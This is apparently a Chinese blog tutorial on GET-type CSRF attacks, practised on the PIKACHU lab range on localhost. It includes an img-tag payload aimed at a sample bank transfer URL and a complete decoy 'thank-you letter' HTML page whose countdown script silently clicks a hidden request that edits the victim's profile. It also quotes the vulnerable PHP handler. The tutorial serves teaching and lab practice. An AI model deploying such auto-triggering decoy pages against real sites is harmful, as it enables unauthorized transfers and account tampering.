CSRF | GET 型 CSRF 漏洞攻击

关注这个漏洞的其他相关笔记:CSRF 漏洞 - 学习手册-CSDN博客

0x01:GET 型 CSRF 漏洞攻击 —— 理论篇

GET 型 CSRF 漏洞是指攻击者通过构造恶意的 HTTP GET 请求,利用用户的登录状态,在用户不知情的情况下,诱使浏览器向受信任的网站发送请求,从而执行非用户意图的操作。

常见的攻击方式: 攻击者通过在站点中嵌入恶意链接到图片、链接或者隐藏的 iframe 中,诱使用户点击或者在不知情的情况下触发请求,从而发起攻击。例如,攻击者可以创建一个隐藏的 iframe,其中包含对银行网站的转账请求,当用户访问包含该 iframe 的页面时,浏览器会携带用户的会话 Cookie 自动发起转账请求,而用户可能对此还一无所知。

其攻击流程如下图所示:

比如,某家银行的转账接口请求包如下(假设该家银行存在 CSRF 漏洞):

 http://bank.example.com?act=transfer&money=$money$&to=$email$
 ​
 act=transfer  -- 执行转账操作
 money=$money$ -- 转账的金额
 to=$email$    -- 转账的对象

那么攻击者通过在网页中嵌入下面的代码,并诱导用户访问,当用户访问嵌入了恶意代码的站点时,用户浏览器就自动会向 bank.example.com 站点的转账接口发起请求,导致攻击发生:

 <img src="http://bank.example.com?act=transfer&money=100&to=hacker@test.com">

当然,前提是,用户登录了那家银行,而且登录凭证(Cookie or Session)还未失效。

0x02:GET 型 CSRF 漏洞攻击 —— 实战篇

实验工具准备

本次的实验环境,我们采用现成的 PIKACHU 靶场,PIKACHU 靶场的安装方法参考上面提供的链接,这里就不多说了,下面直接进入演示流程。

0x0201:GET 型 CSRF 攻击

在浏览器的导航栏中输入下面的网址,访问实验环境:

 http://localhost/pikachu/vul/csrf/csrfget/csrf_get_login.php

随机挑选一个账号进行登录,这里笔者选择的是,allen:123456

点击 ”修改个人信息“ 按钮,并打开浏览器的 ”开发者工具“ 进行抓包:

然后随便修改点信息,比如我把手机号修改成,123456,并点击 submit 进行提交,注意抓包:

可以看到,我们是通过 GET 方式向站点后端接口传递参数来修改我们的个人信息。如果这个接口没有做任何的安全防御措施,那我们完全可以通过直接访问这个 GET 请求的链接,来达到,向后端提交个人信息修改的这么一个操作。

上面的那条 GET 请求拿下来是这样的:

 http://localhost/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=123456&add=nba 76&email=allen@pikachu.com&submit=submit

我们手动把 add 参数变一下,比如改成 “翻斗花园翻斗大街 1408 号”:

 http://localhost/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=123456&add=翻斗花园翻斗大街 1408 号&email=allen@pikachu.com&submit=submit

然后直接通过浏览器访问上面的链接,可以发现,当前登录的用户(allen)的个人信息发生了改变:

此时已经可以判定,该站点修改个人信息的接口存在 CSRF 漏洞,攻击者可以很轻松的伪造符合接口要求的请求,只要网站的受信用户点击带有 CSRF 攻击的链接,即可被修改个人信息。(真的需要用户自己傻乎乎的去点吗?)

接下来,我们模拟攻击者,创造一个可以自动触发攻击代码的页面,将下面的 HTML 代码直接复制进一个 HTML 文件中,然后双击打开这个 HTML 文件即可:

 
<!-- File Name:cssrf_get.html -->
 <!DOCTYPE html>
 <html lang="zh-CN">
 ​
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>感谢信</title>
     <style>
         body {
             font-family: 'Times New Roman', serif;
             background-color: #f4f4f4;
             display: flex;
             justify-content: center;
             align-items: center;
             height: 100vh;
             margin: 0;
         }
 ​
         .declaration {
             background-color: #fff;
             padding: 20px;
             border: 1px solid #ddd;
             box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
             max-width: 600px;
             margin: auto;
         }
 ​
         h1 {
             text-align: center;
             color: #333;
         }
 ​
         p {
             text-align: justify;
             line-height: 1.6;
             color: #666;
         }
 ​
         .modal {
             position: fixed;
             top: 20px;
             right: 20px;
             background-color: #fff;
             padding: 20px;
             border: 1px solid #ddd;
             box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
             display: flex;
             flex-direction: column;
             align-items: center;
             justify-content: center;
             gap: 10px;
         }
 ​
         .modal h2 {
             margin: 0;
             color: #333;
         }
 ​
         .modal p {
             margin: 0;
             color: #666;
         }
 ​
         .modal button {
             padding: 10px 20px;
             cursor: pointer;
             background-color: #4CAF50;
             color: white;
             border: none;
             border-radius: 5px;
         }
 ​
         .hidden {
             display: none;
         }
     </style>
 </head>
 ​
 <body>
     <div class="declaration">
         <h1>感谢信</h1>
         <p>致亲爱的读者们:</p>
         <p>首先,我想对每一位关注我的 CSDN 网安区博客的朋友们表示衷心的感谢。你们的支持和鼓励是我不断前进的动力。</p>
         <p>自从我开始在 CSDN 上分享网络安全相关的知识和见解以来,我收到了许多宝贵的反馈和建议。这些交流不仅丰富了我的知识,也帮助我成长为一个更好的内容创作者。</p>
         <p>我承诺将继续努力,为大家带来更多高质量的内容。同时,我也期待与大家有更多的互动和交流,共同探讨网络安全领域的最新动态和技术。</p>
         <p>再次感谢大家的关注和支持,让我们一起在网络安全的道路上不断前行。</p>
         <div class="signature">
             <p>—— 您忠实的博主</p>
             <p>[Blue17]</p>
             <p>[2024/09/22]</p>
         </div>
         <a id="csrf_payload"
             href="http://localhost/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=123456&add=nba%2076%3Cbr%3E%3Cp%3E%E2%9D%A4Blue17%20Is%20A%20Good%20CSDN%20Creator%E2%9D%A4%3Cp%3E&email=allen%40pikachu.com&submit=submit"></a> 
     </div>
     <div id="modal" class="modal hidden">
         <h2>惊喜倒计时</h2>
         <p id="countdown">20</p>
         <button id="closeModal">关闭</button>
     </div>
     <script>
         var modal = document.getElementById('modal');
         var countdownElement = document.getElementById('countdown');
         var closeModalButton = document.getElementById('closeModal');
         var link = document.getElementById('csrf_payload');
 ​
         // 显示模态框
         modal.classList.remove('hidden');
 ​
         // 倒计时
         var countdown = 20;
         var intervalId = setInterval(function() {
             countdownElement.textContent = countdown;
             countdown--;
             if (countdown <= 0) {
                 clearInterval(intervalId);
                 // 模拟点击
                 link.click();
                 // 关闭模态框
                 modal.classList.add('hidden');
             }
         }, 1000);
 ​
         // 关闭模态框
         closeModalButton.addEventListener('click', function() {
             clearInterval(intervalId);
             modal.classList.add('hidden');
         });
     </script>
 </body>
 ​
 </html>

这个是笔者给诸位写的一份感谢信,怕诸位太过于感动,特地给你们写了一个阅读倒计时,当倒计时结束时,JavaScript 会模拟用户的点击事件,触发我藏在页面中的小彩蛋(CSRF 攻击指令),修改用户的个人信息,添加上我个人专属 Logo:

这个实验就是告诉诸位,你不点,有的是代码帮你点!至此,GET 型 CSRF 攻击演示完毕。

0x0202:GET 型 CSRF 代码分析

下面是触发 GET 型 CSRF 漏洞的关键代码:

 // csrf_get_edit.php
 $html1='';
 if(isset($_GET['submit'])){
     if($_GET['sex']!=null && $_GET['phonenum']!=null && $_GET['add']!=null && $_GET['email']!=null){
         $getdata=escape($link, $_GET);
         $query="update member set sex='{$getdata['sex']}',phonenum='{$getdata['phonenum']}',address='{$getdata['add']}',email='{$getdata['email']}' where username='{$_SESSION['csrf']['username']}'";
         $result=execute($link, $query);
         if(mysqli_affected_rows($link)==1 || mysqli_affected_rows($link)==0){
             header("location:csrf_get.php");
         }else {
             $html1.='修改失败,请重试';
 ​
         }
     }
 }

上面的代码,简单来说,就是通过 $_GET 来获取前端用户传递过来的请求信息,并根据这些信息更新数据库中的内容。CSRF 漏洞发生的位置就是获取前端用户传递请求信息的部分。

因为接口传参太有规律了,太好猜了,Hacker 能一下子就找到这个接口参数的规律,从而发起攻击。有没有觉得一阵后怕,回想一下自己写的那些业务接口,谁会没事找两个随机参数进行传递?

所以,安全,和便捷,永远是两个对立面,我们能做的,也就是尽量找到最优解。

0x03:参考文献

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SRC_BLUE_17

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值